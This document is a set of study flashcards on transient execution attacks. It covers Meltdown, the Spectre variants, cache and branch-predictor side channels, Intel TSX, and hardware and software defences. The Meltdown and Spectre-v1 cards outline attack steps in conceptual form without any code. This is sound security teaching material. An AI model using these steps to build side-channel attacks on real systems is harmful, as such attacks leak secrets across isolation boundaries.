Transient Execution Attacks - 19
Call Kai
Learn
Practice Test
Spaced Repetition
Match
Flashcards
Knowt Play1/17
There's no tags or description
Looks like no tags are added yet.
Name | Mastery | Learn | Test | Matching | Spaced | Call with Kai |
|---|
No analytics yet
Send a link to your students to track their progress
18 Terms
What is the concept behind Transient Execution Attacks?
Using speculative execution to execute unprivileged code on a target. Allows the attackers to create side channels.
A key technique to leak secrets across privilege domains
What are Privilege domains?
Modern computers have plenty security domains
TAEs allow to attack victims either:
Within the same privilege domain (e.g., process A→process B)
Across privilege domains (e.g., process→kernel)
What are Caches?
Caches store recently accessed memory
Different types of caches (I-Cache vs. D-Cache)
Arranged in a cache hierarchy
Tackles a key performance bottleneck: memory in DRAM
We can build timing side-channels via caches!
If a value is in cache, subsequent access will be fast
Otherwise, it will be slow
What are Branch Predictors?
Branch predictors predict potential branch targets
Key performance optimizations in modern CPUs
Different approaches for direct and indirect branches
CPU executes predicted branch targets speculatively
Results are architecturally committed when target turns out correct
Otherwise discarded
Regardless of result, speculative execution leaves traces in the microarchitecture
This includes the cache(!)
What is Out of Order Execution?
Another key performance optimization, next to speculative execution
Hides/minimizes latency (e.g, cache misses, FPU operations, etc)
Keeps elements in execution pipeline busy
Exploits the fact that in architecture, instructions can be reordered
Usually no issue when there are no data dependencies
Results are only committed (architecturally) once all operations completed
As with speculative execution, leaves data in cache(!)
What is Meltdown?
In essence, we just saw Meltdown. Now what if:
1. We can (transiently) dereference an interesting value inaccessible to us?
2. We can suppress the architectural failure?
3. Exfiltrate the value?
All of this turns out possible on (older) Intel CPUs:
1. Example: Kernel addresses from user space
2. Use custom SIGSEGV handler (or other methods)
3. Flush+Reload
What are some Common Techniques for Suppressing faults?
Custom segfault handlers
What we just saw
Intel’s Transactional Synchronization Extensions (TSX)
What is TSX?
Intel’s Transactional Synchronization Extensions
ISA extension for hardware transactional memory
Key idea: allow parallelism via lock elision
Data accesses are bundled in transactions
If transaction fails:
Re-roll and try again (HLE)
Jmp to custom handler (RTM)
Now disabled for desktop CPUs, still available on (some) Xeon CPUs
What is Spectre?
Abuses branch (mis)prediction & speculative execution
Access sensitive data transiently
Cache Side-Channel to exfiltrate data
Full class of attacks
New variants are stilled discovered
Previously thought mitigated issues turn out to be still exploitable
Still an active research topic
What are the steps in the Spectre-v1 (Spectre-PHT) attack?
Attack steps:
1) Train direct branch predictor to take branch
2) Execute target with x out of bounds
This will transiently access the value at array1[x]
And encode it into array[2]
3) Exfiltrate secret via cache-side channel by probing array2
E.g., via FLUSH+RELOAD (not shown in code snippet)
What are some Spectre Variants?
V1: Bounds Check Bypass (BCB)
aka Spectre-PHT
V2: Branch Target Injection (BTI)
aka Spectre-BTI
V3: Rogue Data Cache Load (RDCL)
aka Meltdown
V4: Speculative Store Bypass (SSB)
aka Spectre-NG
???: Return Mispredict
aka Spectre-RSB
What can spectre attacks do?
Derandomize KASLR
Read data from other processes
Read data from the kernel
Bypass hardware security features (e.g., arm PAC)
Read data from virtual machines on the same physical host
More generally: Transient execution attacks break isolation
What was the impact of spectre and meltdown?
Almost every CPU before 2018 vulnerable against Spectre Attacks
Software & Microcode mitigations
Partially high performance impact
Newer CPU have hardware mitigations against some variants
Fixing Spectre & Meltdown variants took time
Meltdown now fully mitigated in hardware
Fixing Spectre completely turned out rather difficult
What are some defences against microarchitectural attacks?
Hotfixes and Workarounds
Hardware Defenses
Systematic Defenses
What is the Hotfixes and Workarounds defence?
Intermediate solution after found vulnerabilities
Either implemented by:
Removing particular gadgets used during attacks
Changes to software (e.g., adding speculation barriers via FENCE instructions)
Microcode updates (e.g., to disable features or change instruction behavior)
Advantage: Fast mitigation of specific attack vector
Disadvantages: Performance overhead & may not fully mitigate attacks
What is are Hardware Defenses?
Take time to develop
CPU design-release cycle takes multiple years
As user/typical defender, we have no influence over this
Sometimes allow to fully remove vulnerability
E.g., in-hardware mitigation Meltdown: Checking of privilege before transient memory loads
May not be complete (for performance reasons)
E.g., eIBRS against Spectre-BTB, later bypassed via Spectre-BHI*
What are Systematic Defenses?
Less used in practice:
Often high performance overhead
Major changes to software needed
But some examples:
Secret Free Hypervisor*
Rendering leaking from the hypervisor inefficient
Quarantine**
Isolating security domains on different cores
Undocumented defenses by cloud vendors
E.g., aws
What is Transient Execution and how can attackers abuse this?
Transient Execution changes the microarchitectural state. Even if results are not used architecturally, transient execution leaves traces in the microarchitecture.
Attackers can abuse this to leak information across privilege domains via side-channels.